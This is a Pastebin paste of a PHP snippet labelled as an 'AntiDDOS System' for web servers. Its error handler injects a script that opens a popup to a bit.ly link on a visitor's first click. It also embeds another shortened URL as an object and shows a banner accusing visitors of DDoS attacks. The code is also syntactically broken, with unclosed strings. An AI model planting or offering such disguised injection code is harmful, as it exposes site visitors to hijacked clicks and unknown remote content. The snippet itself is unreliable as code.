Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- try{
- if (!file_exists('anti_ddos/start.php'))
- throw new Exception ('anti_ddos/start.php does not exist');
- else
- require_once('anti_ddos/start.php');
- }
- //CATCH the exception if something goes wrong.
- catch (Exception $ex) {
- // et's print a message saying there is an error
- echo '<script type="text/javascript">
- var b=0;
- $('body').click(function(){
- if(b==0){
- window.open ("https://bit.ly/3qnU9XF","popup","menubar=1,resizable=1,width=450,height=300");
- b++;
- }
- });
- </script>
- echo '<object type="text/html" data="https://bit.ly/3elcmPS" weight=100%>
- echo '<div style="padding:10px;color:white;position:fixed;top:0;left:0;width:100%;background:black;text-align:center;">The <a href="https://bit.ly/3qnU9XF" target="_blank">"AntiDDOS System"</a> Was Caught You Because You Attacking Web With Your DDoS, Please Your Reload Again If Not :)</div>';
- //Print out the exception message.
- //echo $ex->getMessage();
- }
- // cp -r AntiDDOS-system/ /var/www/html/
- // Author By AriyanXploit404
- ?>
Add Comment
Please, Sign In to add comment